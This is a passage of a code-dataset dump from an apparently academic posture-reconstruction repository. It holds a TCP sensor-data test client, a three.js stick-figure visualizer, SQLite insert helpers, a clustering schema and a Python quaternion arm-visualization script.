"text": "const net = require('net')\nconst client = new net.Socket()\n\nconst PORT = 9000\nconst ADDR = '127.0.0.1' // change this to the router address of android wifi hotspot\nvar offset100 = 0\nvar offset20 = 0\nvar offset1 = 0\n\nclient.connect(PORT, ADDR, () => {\n console.log('connect...')\n setInterval(() => {\n var buffer = Buffer.alloc(60)\n buffer.writeUInt32LE(11111000, 0)\n buffer.writeUInt32LE(new Date().valueOf() - 1517381000000, 4)\n buffer.writeFloatLE(0.1 + offset100, 8)\n buffer.writeFloatLE(0.2 + offset100, 12)\n buffer.writeFloatLE(0.3 + offset100, 16)\n buffer.writeFloatLE(0.4 + offset100, 20)\n buffer.writeFloatLE(1.1 + offset100, 24)\n buffer.writeFloatLE(1.2 + offset100, 28)\n buffer.writeFloatLE(1.3 + offset100, 32)\n buffer.writeFloatLE(2.1 + offset100, 36)\n buffer.writeFloatLE(2.2 + offset100, 40)\n buffer.writeFloatLE(2.3 + offset100, 44)\n buffer.writeFloatLE(3.1 + offset100, 48)\n buffer.writeFloatLE(3.2 + offset100, 52)\n buffer.writeFloatLE(3.3 + offset100, 56)\n client.write(buffer)\n offset100 += 0.000000001\n }, 10)\n\n setInterval(() => {\n var buffer = Buffer.alloc(20)\n buffer.writeUInt32LE(11111000, 0)\n buffer.writeUInt32LE(new Date().valueOf() - 1517381000000, 4)\n buffer.writeFloatLE(4.1 + offset20, 8)\n buffer.writeFloatLE(4.2 + offset20, 12)\n buffer.writeFloatLE(4.3 + offset20, 16)\n client.write(buffer)\n offset20 += 0.000000001\n }, 50)\n\n setInterval(() => {\n var buffer = Buffer.alloc(12)\n buffer.writeUInt32LE(11111000, 0)\n buffer.writeUInt32LE(new Date().valueOf() - 1517381000000, 4)\n buffer.writeFloatLE(8.1 + offset1, 8)\n client.write(buffer)\n offset1 += 0.000000001\n }, 1000)\n\n client.on('error', (e) => {\n console.log(e)\n })\n})\n"
},
{
"alpha_fraction": 0.671640932559967,
"alphanum_fraction": 0.6891971230506897,
"avg_line_length": 38.464202880859375,
"blob_id": "ae594ab3c68551152a4fc125113f23902970cf1b",
"content_id": "00aefd56387bd9b40931acde290fb5eb5d880032",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 17088,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 433,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/components/stick-figure/stick-figure.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit, AfterViewInit, Input, OnChanges } from '@angular/core';\nimport * as THREE from 'three';\ndeclare function require(name:string);\nvar OrbitControls = require('three-orbit-controls')(THREE);\nvar STLLoader = require('three-stl-loader')(THREE);\nvar loader = new STLLoader();\nloader.loadPromise = function (path) {\n return new Promise((resolve, reject) => {\n loader.load(path, geometry => {\n resolve(geometry)\n })\n }).catch(e => {\n console.log(e)\n })\n}\n\n@Component({\n moduleId: module.id,\n selector: 'app-stick-figure',\n templateUrl: './stick-figure.component.html',\n styleUrls: ['./stick-figure.component.css']\n})\nexport class StickFigureComponent implements OnInit {\n @Input() angleData\n @Input() name: string;\n @Input() container: HTMLElement;\n @Input() axisNames: string[];\n\n camera: any;\n scene: any;\n renderer: any;\n geometry: any;\n material: any;\n mesh: any;\n rendererHeight = 800;\n rendererWidth = 800;\n WIDTH_FACTOR = 0.49;\n HEIGHT_FACTOR = 0.8;\n AXIS_LENGTH = 430;\n TORSO_LENGTH = 260;\n SHOULDER_Y_POS = 180;\n SHOULDER_Z_POS = 100;\n SHOULDER_X_POS = -30;\n UPPER_ARM_LENGTH = 105;\n NECK_LENGTH = this.TORSO_LENGTH - this.SHOULDER_Y_POS;\n LOWER_ARM_Y_OFFSET = -10;\n ARM_LENGTH = this.AXIS_LENGTH / 4\n\n TRACE_SEGMENTS = 25;\n objectDragged = 'none';\n mousePos = {x: 0, y: 0};\n cameraPos = {x: 0.425, y: 0.595};\n vectorObject: any = new THREE.Line();\n\n lineTorso: any;\n lineLeftUpperArm: any;\n lineRightUpperArm: any;\n\n meshTorso: THREE.Mesh;\n meshLeftUpperArm: THREE.Mesh;\n meshLeftLowerArm: THREE.Mesh;\n meshRightUpperArm: THREE.Mesh;\n meshRightLowerArm: THREE.Mesh;\n meshHead: THREE.Mesh;\n\n vectorQuaternion: any = new THREE.Quaternion();\n rotationAxis: any = new THREE.Vector3(0, 1, 0);\n axisXName: any;\n axisYName: any;\n axisZName: any;\n // eulerOrder = 'XYZ';\n eulerOrder = 'YZX';\n\n showAxis = true;\n // rotationAxisObject: any = new THREE.Line();\n\n\n constructor() { }\n\n ngOnInit() {\n const aspectRatio = 1;\n this.camera = new THREE.PerspectiveCamera(75, aspectRatio, 1, 10000);\n this.turnCamera();\n\n this.scene = new THREE.Scene();\n var light = new THREE.HemisphereLight( 0xffffee, 0x080820, 1 );\n this.scene.add( light );\n\n\n this.initGrid();\n this.initAxes();\n this.initAxesNames();\n // this.initLineTrace();\n // this.initRotationAxis();\n\n\n\n this.renderer = new THREE.WebGLRenderer({ alpha: true , antialias: true});\n this.renderer.setSize(this.rendererWidth, this.rendererHeight);\n this.renderer.setClearColor( 0xffffff, 1 );\n this.container.appendChild(this.renderer.domElement);\n this.container.addEventListener('mousemove', this.handleMouseMove.bind(this), false);\n this.container.addEventListener('mousedown', this.handleMouseDown.bind(this), false);\n this.container.addEventListener('mouseup', this.handleMouseUp.bind(this), false);\n this.container.addEventListener('touchmove', this.handleTouchMove.bind(this), false);\n this.container.addEventListener('touchstart', this.handleTouchStart.bind(this), false);\n this.container.addEventListener('touchend', this.handleTouchEnd.bind(this), false);\n // this.updateRotationAxis();\n\n // this.scene.add(this.rotationAxisObject);\n\n // vectorQuaternion.normalize();\n // this.renderer.render(this.scene, this.camera);\n // this.animate(this.angleData);\n\n this.initVector().then(() => {\n this.updateVectorVisuals();\n this.renderer.render(this.scene, this.camera);\n this.animate(this.angleData);\n })\n }\n\n\n animate(angleData) {\n // this.vectorQuaternion.x = angleData.quaternion.x;\n // this.vectorQuaternion.w = angleData.quaternion.w;\n // this.vectorQuaternion.y = angleData.quaternion.y;\n // this.vectorQuaternion.z = angleData.quaternion.z;\n\n // this.updateRotationAxis();\n this.updateVectorVisuals();\n this.renderer.render(this.scene, this.camera);\n this.updateAxesNames();\n setTimeout(() => {\n this.animate(angleData);\n } , 20);\n }\n\n setQuat(target, val) {\n target.quaternion.w = val.quaternion.w\n target.quaternion.x = val.quaternion.x\n target.quaternion.y = val.quaternion.y\n target.quaternion.z = val.quaternion.z\n }\n\n updateVectorVisuals() {\n this.setQuat(this.lineTorso, this.angleData.torso)\n this.setQuat(this.meshTorso, this.angleData.torso)\n var orig_torsoVector = this.lineTorso.geometry.vertices[4].clone()\n var curTorsoVector = new THREE.Vector3(orig_torsoVector.x, orig_torsoVector.y, orig_torsoVector.z).applyQuaternion(this.lineTorso.quaternion)\n this.meshHead.position.set(curTorsoVector.x, curTorsoVector.y, curTorsoVector.z)\n this.setQuat(this.meshHead, this.angleData.head)\n\n var upperRightArmVector = this.lineTorso.geometry.vertices[3].clone()\n var curRightUpperArmVector = new THREE.Vector3(upperRightArmVector.x, upperRightArmVector.y, upperRightArmVector.z).applyQuaternion(this.lineTorso.quaternion)\n this.lineRightUpperArm.position.set(curRightUpperArmVector.x, curRightUpperArmVector.y, curRightUpperArmVector.z)\n this.meshRightUpperArm.position.set(curRightUpperArmVector.x, curRightUpperArmVector.y, curRightUpperArmVector.z)\n this.setQuat(this.lineRightUpperArm, this.angleData.rightUpper)\n this.setQuat(this.meshRightUpperArm, this.angleData.rightUpper)\n\n\n curRightUpperArmVector.add(this.lineRightUpperArm.geometry.vertices[1].clone().applyQuaternion(this.lineRightUpperArm.quaternion))\n this.meshRightLowerArm.position.set(curRightUpperArmVector.x, curRightUpperArmVector.y, curRightUpperArmVector.z)\n this.setQuat(this.meshRightLowerArm, this.angleData.rightLower)\n\n var upperLeftArmVector = this.lineTorso.geometry.vertices[2].clone()\n var curLeftUpperArmVector = new THREE.Vector3(upperLeftArmVector.x, upperLeftArmVector.y, upperLeftArmVector.z).applyQuaternion(this.lineTorso.quaternion)\n this.lineLeftUpperArm.position.set(curLeftUpperArmVector.x, curLeftUpperArmVector.y, curLeftUpperArmVector.z)\n this.meshLeftUpperArm.position.set(curLeftUpperArmVector.x, curLeftUpperArmVector.y, curLeftUpperArmVector.z)\n this.setQuat(this.lineLeftUpperArm, this.angleData.leftUpper)\n this.setQuat(this.meshLeftUpperArm, this.angleData.leftUpper)\n\n\n curLeftUpperArmVector.add(this.lineLeftUpperArm.geometry.vertices[1].clone().applyQuaternion(this.lineLeftUpperArm.quaternion))\n this.meshLeftLowerArm.position.set(curLeftUpperArmVector.x, curLeftUpperArmVector.y, curLeftUpperArmVector.z)\n this.setQuat(this.meshLeftLowerArm, this.angleData.leftLower)\n\n }\n\n turnCamera() {\n this.camera.position.x = Math.sin(this.cameraPos.x) * 1000 * Math.cos(this.cameraPos.y);\n this.camera.position.z = Math.cos(this.cameraPos.x) * 1000 * Math.cos(this.cameraPos.y);\n this.camera.position.y = Math.sin(this.cameraPos.y) * 1000;\n this.camera.lookAt(new THREE.Vector3(0, 0, 0));\n }\n\n initGrid() {\n const GRID_SEGMENT_COUNT = 5;\n const gridLineMat = new THREE.LineBasicMaterial({color: 0xDDDDDD});\n const gridLineMatThick = new THREE.LineBasicMaterial({color: 0xAAAAAA, linewidth: 2});\n\n for (let i = -GRID_SEGMENT_COUNT; i <= GRID_SEGMENT_COUNT; i++) {\n const dist = this.AXIS_LENGTH * i / GRID_SEGMENT_COUNT;\n const gridLineGeomX = new THREE.Geometry();\n const gridLineGeomY = new THREE.Geometry();\n\n if (i === 0) {\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, -this.AXIS_LENGTH));\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, 0));\n\n gridLineGeomY.vertices.push(new THREE.Vector3(-this.AXIS_LENGTH, 0, dist));\n gridLineGeomY.vertices.push(new THREE.Vector3( 0, 0, dist));\n\n this.scene.add(new THREE.Line(gridLineGeomX, gridLineMatThick));\n this.scene.add(new THREE.Line(gridLineGeomY, gridLineMatThick));\n } else {\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, -this.AXIS_LENGTH));\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, this.AXIS_LENGTH));\n\n gridLineGeomY.vertices.push(new THREE.Vector3(-this.AXIS_LENGTH, 0, dist));\n gridLineGeomY.vertices.push(new THREE.Vector3( this.AXIS_LENGTH, 0, dist));\n\n this.scene.add(new THREE.Line(gridLineGeomX, gridLineMat));\n this.scene.add(new THREE.Line(gridLineGeomY, gridLineMat));\n }\n }\n }\n\n initAxes() {\n const xAxisMat = new THREE.LineBasicMaterial({color: 0xff0000, linewidth: 2});\n const xAxisGeom = new THREE.Geometry();\n xAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n xAxisGeom.vertices.push(new THREE.Vector3(this.AXIS_LENGTH, 0, 0));\n const xAxis = new THREE.Line(xAxisGeom, xAxisMat);\n this.scene.add(xAxis);\n\n const yAxisMat = new THREE.LineBasicMaterial({color: 0x00cc00, linewidth: 2});\n const yAxisGeom = new THREE.Geometry();\n yAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n yAxisGeom.vertices.push(new THREE.Vector3(0, this.AXIS_LENGTH, 0));\n const yAxis = new THREE.Line(yAxisGeom, yAxisMat);\n this.scene.add(yAxis);\n\n const zAxisMat = new THREE.LineBasicMaterial({color: 0x0000ff, linewidth: 2});\n const zAxisGeom = new THREE.Geometry();\n zAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n zAxisGeom.vertices.push(new THREE.Vector3(0, 0, this.AXIS_LENGTH));\n const zAxis = new THREE.Line(zAxisGeom, zAxisMat);\n this.scene.add(zAxis);\n }\n\n initAxesNames() {\n const objects = new Array(3);\n const colors = ['#ff0000', '#00cc00', '#0000ff'];\n for (let i = 0, len = objects.length; i < len; i++) {\n objects[i] = document.createElement('div');\n objects[i].innerHTML = this.axisNames[i];\n objects[i].style.position = 'absolute';\n objects[i].style.transform = 'translateX(-50%) translateY(-50%)';\n objects[i].style.color = colors[i];\n document.body.appendChild(objects[i]);\n }\n this.axisXName = objects[0];\n this.axisYName = objects[1];\n this.axisZName = objects[2];\n }\n\n initVector() {\n const torsoMat = new THREE.LineBasicMaterial({color: 0x000000, linewidth: 10})\n const torsoGeom = new THREE.Geometry();\n torsoGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n const torsoVectorStandard = new THREE.Vector3(0, this.SHOULDER_Y_POS, 0);\n const shoulderVectorLeft = new THREE.Vector3(this.SHOULDER_X_POS, 0, -this.SHOULDER_Z_POS)\n const shoulderVectorRight = new THREE.Vector3(this.SHOULDER_X_POS, 0, this.SHOULDER_Z_POS)\n const neck = new THREE.Vector3(0, this.NECK_LENGTH, 0)\n\n shoulderVectorLeft.add(torsoVectorStandard)\n shoulderVectorRight.add(torsoVectorStandard)\n neck.add(torsoVectorStandard)\n\n torsoGeom.vertices.push(torsoVectorStandard)\n torsoGeom.vertices.push(shoulderVectorLeft)\n torsoGeom.vertices.push(shoulderVectorRight)\n torsoGeom.vertices.push(neck)\n this.lineTorso = new THREE.Line(torsoGeom, torsoMat)\n // this.scene.add(new THREE.Line(torsoGeom, torsoMat))\n\n // const headGeom = new THREE.Geometry();\n // const headVector = new THREE.Vector3(0, this.SHOULDER_Y_POS + this.NECK_LENGTH, 0);\n // headGeom.vertices.push(new THREE.Vector3(0, 0, 0))\n // headGeom.vertices.push(headVector)\n // this.lineHead = new THREE.Line(headGeom, torsoMat)\n\n const rightUpperArmGeom = new THREE.Geometry();\n const rightUpperArmVector = new THREE.Vector3(this.UPPER_ARM_LENGTH - this.SHOULDER_X_POS, this.LOWER_ARM_Y_OFFSET, 18);\n rightUpperArmGeom.vertices.push(new THREE.Vector3(0, 0, 0))\n rightUpperArmGeom.vertices.push(rightUpperArmVector)\n this.lineRightUpperArm = new THREE.Line(rightUpperArmGeom, torsoMat)\n\n const leftUpperArmGeom = new THREE.Geometry();\n const leftUpperArmVector = new THREE.Vector3(this.UPPER_ARM_LENGTH - this.SHOULDER_X_POS, this.LOWER_ARM_Y_OFFSET, -18);\n leftUpperArmGeom.vertices.push(new THREE.Vector3(0, 0, 0))\n leftUpperArmGeom.vertices.push(leftUpperArmVector)\n this.lineLeftUpperArm = new THREE.Line(leftUpperArmGeom, torsoMat)\n\n return loader.loadPromise('./assets/torso.stl')\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xBEBEBE } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n this.meshTorso = mesh\n return loader.loadPromise('./assets/Head.stl');\n })\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xBEBEBE } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n this.meshHead = mesh\n mesh.position.set(0, this.TORSO_LENGTH, 0);\n return loader.loadPromise('./assets/Left_Upper_Arm.stl');\n })\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xBEBEBE } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n mesh.position.set(this.SHOULDER_X_POS, this.SHOULDER_Y_POS, -this.SHOULDER_Z_POS);\n this.meshLeftUpperArm = mesh\n return loader.loadPromise('./assets/Right_Upper_Arm.stl');\n })\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xBEBEBE } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n mesh.position.set(this.SHOULDER_X_POS, this.SHOULDER_Y_POS, this.SHOULDER_Z_POS);\n this.meshRightUpperArm = mesh\n return loader.loadPromise('./assets/Left_Lower_Arm.stl');\n })\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xFFD000 } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n mesh.position.set(this.UPPER_ARM_LENGTH, this.SHOULDER_Y_POS + this.LOWER_ARM_Y_OFFSET, -118);\n this.meshLeftLowerArm = mesh\n return loader.loadPromise('./assets/Right_Lower_Arm.stl');\n })\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xFFD000 } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n this.meshRightLowerArm = mesh\n mesh.position.set(this.UPPER_ARM_LENGTH, this.SHOULDER_Y_POS + this.LOWER_ARM_Y_OFFSET, 118);\n })\n\n }\n\n handlePointerMove(x, y) {\n const mouseDiffX = x - this.mousePos.x;\n const mouseDiffY = y - this.mousePos.y;\n this.mousePos = {x: x, y: y};\n if (this.objectDragged === 'scene') {\n this.cameraPos.x -= mouseDiffX / 200;\n this.cameraPos.y += mouseDiffY / 200;\n this.cameraPos.y = Math.min(this.cameraPos.y, 3.1415926 / 2);\n this.cameraPos.y = Math.max(this.cameraPos.y, -3.1415926 / 2);\n this.turnCamera();\n }\n }\n\n handleTouchMove(event) {\n if (this.objectDragged !== 'none') {\n event.preventDefault();\n }\n this.handlePointerMove(event.touches[0].clientX, event.touches[0].clientY);\n }\n\n handleMouseMove(event) {\n if (this.objectDragged !== 'none') {\n event.preventDefault();\n }\n this.handlePointerMove(event.clientX, event.clientY);\n }\n\n\n handleTouchStart(event) {\n this.handlePointerStart(event.touches[0].clientX, event.touches[0].clientY);\n }\n handleMouseDown(event) {\n this.handlePointerStart(event.clientX, event.clientY);\n }\n\n handlePointerStart(x, y) {\n this.mousePos = {x: x, y: y};\n const rect = this.renderer.domElement.getBoundingClientRect();\n if (this.mousePos.x >= rect.left\n && this.mousePos.x <= rect.left + this.rendererWidth\n && this.mousePos.y >= rect.top\n && this.mousePos.y <= rect.top + this.rendererHeight && this.objectDragged === 'none') {\n this.objectDragged = 'scene';\n }\n }\n\n handleTouchEnd(event) {\n this.objectDragged = 'none';\n }\n handleMouseUp(event) {\n this.objectDragged = 'none';\n }\n\n // updateRotationAxis() {\n // const theta = Math.acos(this.vectorQuaternion.w) * 2;\n // const sin = Math.sin(theta / 2);\n // if (sin >= 0.01 || sin <= -0.01) {\n // // console.log(quatY + \" \"+ quatZ + \" \"+ sin)\n // this.rotationAxis.x = this.vectorQuaternion.x / sin;\n // this.rotationAxis.y = this.vectorQuaternion.y / sin;\n // this.rotationAxis.z = this.vectorQuaternion.z / sin;\n // this.rotationAxis.normalize();\n // }\n // }\n\n toXYCoords(pos) {\n const sitetop = window.pageYOffset || document.documentElement.scrollTop;\n const siteleft = window.pageXOffset || document.documentElement.scrollLeft;\n const vector = pos.clone().project(this.camera);\n const rect = this.renderer.domElement.getBoundingClientRect();\n const vector2 = new THREE.Vector3(0, 0, 0);\n vector2.x = siteleft + rect.left + ( vector.x + 1) / 2 * (rect.right - rect.left);\n vector2.y = sitetop + rect.top + (-vector.y + 1) / 2 * (rect.bottom - rect.top);\n return vector2;\n }\n\n updateAxesNames() {\n const distance = this.AXIS_LENGTH * 1.1;\n const vectors = [new THREE.Vector3(distance, 0, 0), new THREE.Vector3(0, distance, 0), new THREE.Vector3(0, 0, distance)];\n const objects = [this.axisXName, this.axisYName, this.axisZName];\n for (let i = 0; i < objects.length; i++) {\n const position = this.toXYCoords(vectors[i]);\n objects[i].style.top = position.y + 'px';\n objects[i].style.left = position.x + 'px';\n }\n }\n\n}\n"
},
{
"alpha_fraction": 0.6948728561401367,
"alphanum_fraction": 0.7102959752082825,
"avg_line_length": 44.26415252685547,
"blob_id": "72397ab7a7897a6e3ede674b1a470154fe60ad7b",
"content_id": "11eaa2c907c4fc32beafc6adce73c39beb7a35d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2399,
"license_type": "no_license",
"max_line_length": 235,
"num_lines": 53,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/prev_db_service/db_service_better_sqlite3_promise.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst Database = require('better-sqlite3')\nconst Promise = require('bluebird')\nconst db = new Database('./userActivityData.db')\nconst fs = require('fs')\nvar dbInit = fs.readFileSync('./dbInit.sql')\ndb.exec(dbInit.toString())\nvar dbPromise = Promise.resolve()\n// .then(() => {\n\n// })\n\nvar insertSensorData100HzStatement = db.prepare(`INSERT INTO SensorData100Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, quat_w, quat_x, quat_y, quat_z, gyro_x, gyro_y, gyro_z, lacc_x, lacc_y, lacc_z, acc_x, acc_y, acc_z)\n VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`)\nvar insertSensorData20HzStatement = db.prepare(`INSERT INTO SensorData20Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, mag_x, mag_y, mag_z)\n VALUES(?, ?, ?, ?, ?, ?, ?)`)\nvar insertSensorData1HzStatement = db.prepare(`INSERT INTO SensorData1Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, temp)\n VALUES(?, ?, ?, ?, ?)`)\nvar insertHealthStatement = db.prepare(`INSERT INTO SensorFreq(server_id, sensor_id, server_timestamp, frequency)\n VALUES(?, ?, ?, ?)`)\n\nfunction insertSensorData100Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(() => {\n insertSensorData100HzStatement\n .run([serverId, sensorId, sensorTimestamp, serverTimestamp, data.quat.w, data.quat.x, data.quat.y, data.quat.z, data.gyro.x, data.gyro.y, data.gyro.z, data.lacc.x, data.lacc.y, data.lacc.z, data.acc.x, data.acc.y, data.acc.z])\n })\n}\nfunction insertSensorData20Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(() => {\n insertSensorData20HzStatement\n .run([serverId, sensorId, sensorTimestamp, serverTimestamp, data.mag.x, data.mag.y, data.mag.z])\n })\n}\n\nfunction insertSensorData1Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(() => {\n insertSensorData1HzStatement\n .run([serverId, sensorId, sensorTimestamp, serverTimestamp, data.temp])\n })\n}\nfunction insertHealth (serverId, sensorId, serverTimestamp, freq) {\n dbPromise = dbPromise.then(() => {\n insertHealthStatement\n .run([serverId, sensorId, serverTimestamp, freq])\n })\n}\n\nmodule.exports = {\n insertSensorData100Hz: insertSensorData100Hz,\n insertSensorData20Hz: insertSensorData20Hz,\n insertSensorData1Hz: insertSensorData1Hz,\n insertHealth: insertHealth\n}\n"
},
{
"alpha_fraction": 0.5984126925468445,
"alphanum_fraction": 0.5984126925468445,
"avg_line_length": 30.549999237060547,
"blob_id": "c46acd2ea6f6d30e3651a7b438be9a814749d356",
"content_id": "8e386d37d22b38ea71e22015eeab89522ddd2359",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 630,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 20,
"path": "/oriTrakHAR-master/dataProcessing/initClusteringResult.sql",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "CREATE TABLE IF NOT EXISTS ClusteringName (\n id INTEGER PRIMARY KEY,\n name TEXT UNIQUE\n);\n\nCREATE TABLE IF NOT EXISTS ClusterLabel(\n\tcluster_id INTEGER NOT NULL,\n\tcluster INTEGER NOT NULL,\n\tlabel TEXT NOT NULL\n);\n\nCREATE TABLE IF NOT EXISTS ClusteringData(\n\tcluster_id INTEGER NOT NULL,\n\ttimestamp REAL NOT NULL,\n\tlocation_latitude REAL,\n\tlocation_longitude REAL,\n\tcluster INTEGER NOT NULL,\n\tFOREIGN KEY (cluster_id) REFERENCES ClusteringName(id),\n\tPRIMARY KEY (cluster_id, timestamp)\n);"
},
{
"alpha_fraction": 0.5848332047462463,
"alphanum_fraction": 0.6237100958824158,
"avg_line_length": 40.65999984741211,
"blob_id": "c36192dd2d0e36ac88e402c4c8a1df4e8e4679d2",
"content_id": "28926031b7350ebbd8a79f1bc756bd71fed4d9e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4167,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 100,
"path": "/python-code/visualization.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "#euler_order: roll, pitch, yaw\n#original euler_order: yaw pitch roll\n#euler_order in oriTrakHAR: roll yaw pitch \nimport numpy as np\nimport math\nimport time\nfrom pyquaternion import Quaternion\nimport transformations\nimport json\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nANGLE_MAP_L = json.load(open('leftDict_yzx.json', 'r'))\nANGLE_MAP_R = json.load(open('rightDict_yzx.json', 'r'))\nplt.ion()\nfig = plt.figure()\nax = fig.gca(projection='3d')\nt = np.linspace(0, 60, 120)\n\n\nfrom processData import processRow\ninterpolatedData = processRow(['test.csv', 'test2.csv', 'test3.csv', 'test4.csv'], t)\n\n#from processStream import processRow\n#interpolatedData = processRow(['pipe1', 'pipe2','pipe3','pipe4'], t)\n\ndef updateRealtimeVis(quat, idStr, ax):\n if idStr == 'head':\n headPos = quat.rotate([0, 0, 1])\n ind = np.linspace(0,1,11)\n x = [headPos[0]*i for i in ind]\n y = [headPos[1]*i for i in ind]\n z = [headPos[2]*i for i in ind]\n ax.plot(x, y, z)\n return quat\n\n euler = transformations.euler_from_quaternion([quat[1], quat[2], quat[3], quat[0]])\n print(euler)\n if idStr == 'rightArm':\n ans = ANGLE_MAP_R[str(rad2Bucket(euler[2]))][str(rad2Bucket(euler[1]))][str(rad2Bucket(euler[0]))]\n if ans['shoulderX'] is not None:\n elbowRelativeEuler = [deg2rad(ans['shoulderX']), deg2rad(ans['shoulderZ']), deg2rad(ans['shoulderY'])]\n elbowRelativeQuat = transformations.quaternion_from_euler(elbowRelativeEuler[0], elbowRelativeEuler[1], elbowRelativeEuler[2])\n elbowRelativeQuat = Quaternion(elbowRelativeQuat[3], elbowRelativeQuat[0], elbowRelativeQuat[1], elbowRelativeQuat[2])\n elbowPos = elbowRelativeQuat.rotate([0, 0, -1])\n wristRelativePos = quat.rotate([0, 0, -1])\n ind = np.linspace(0,1,11)\n x = [0+elbowPos[0]*i for i in ind] + [0+elbowPos[0]+wristRelativePos[0]*i for i in ind]\n y = [-1+elbowPos[1]*i for i in ind] + [-1+elbowPos[1]+wristRelativePos[1]*i for i in ind]\n z = [0+elbowPos[2]*i for i in ind] + [0+elbowPos[2]+wristRelativePos[2]*i for i in ind]\n ax.plot(x, y, z)\n return elbowRelativeQuat\n \n if idStr == 'leftArm':\n #print(euler)\n ans = ANGLE_MAP_L[str(rad2Bucket(euler[0]))][str(rad2Bucket(euler[2]))][str(rad2Bucket(euler[1]))]\n #print(ans)\n if ans['shoulderX'] is not None:\n elbowRelativeEuler = [deg2rad(ans['shoulderX']), deg2rad(ans['shoulderZ']), deg2rad(ans['shoulderY'])]\n elbowRelativeQuat = transformations.quaternion_from_euler(elbowRelativeEuler[0], elbowRelativeEuler[1], elbowRelativeEuler[2])\n elbowRelativeQuat = Quaternion(elbowRelativeQuat[3], elbowRelativeQuat[0], elbowRelativeQuat[1], elbowRelativeQuat[2])\n elbowPos = elbowRelativeQuat.rotate([0, 0, -1])\n wristRelativePos = quat.rotate([0, 0, -1])\n ind = np.linspace(0,1,11)\n x = [0+elbowPos[0]*i for i in ind] + [0+elbowPos[0]+wristRelativePos[0]*i for i in ind]\n y = [1+elbowPos[1]*i for i in ind] + [1+elbowPos[1]+wristRelativePos[1]*i for i in ind]\n z = [0+elbowPos[2]*i for i in ind] + [0+elbowPos[2]+wristRelativePos[2]*i for i in ind]\n ax.plot(x, y, z)\n return elbowRelativeQuat\n\ndef rad2Bucket(rad):\n radInterval = 5*3.1415926/180\n ans = math.floor(rad / radInterval) * 5\n if ans == 180:\n return 180 - 5\n else:\n return ans\n\ndef deg2rad(deg): \n return deg * 3.1415926 / 180\n\nfor i in t:\n quatHead, quatLeft, quatRight, _, _, _ = next(interpolatedData)\n #print(quatLeft[0], quatLeft[1], quatLeft[2], quatLeft[3])\n ax.clear()\n ind = np.linspace(0, 1, 11)\n x = [0 for i in ind]\n y = [-1+2*i for i in ind]\n z = [0 for i in ind]\n ax.plot(x, y, z)\n x = [0 for i in ind]\n y = [0 for i in ind]\n z = [-2+2*i for i in ind]\n ax.plot(x, y, z)\n updateRealtimeVis(quatHead, 'head', ax)\n updateRealtimeVis(quatLeft, 'leftArm', ax)\n updateRealtimeVis(quatRight, 'rightArm', ax)\n plt.axis('equal')\n plt.show()\n plt.pause(2)\n\n"
},
{
"alpha_fraction": 0.5711590051651001,
"alphanum_fraction": 0.5933513045310974,
"avg_line_length": 34.336509704589844,
"blob_id": "1e30b57ce1b97578db1263ae7724d2068570d70b",
"content_id": "a52457109df64958148571fcfdb65601c1092644",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 11130,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 315,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/betterAngleMap.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
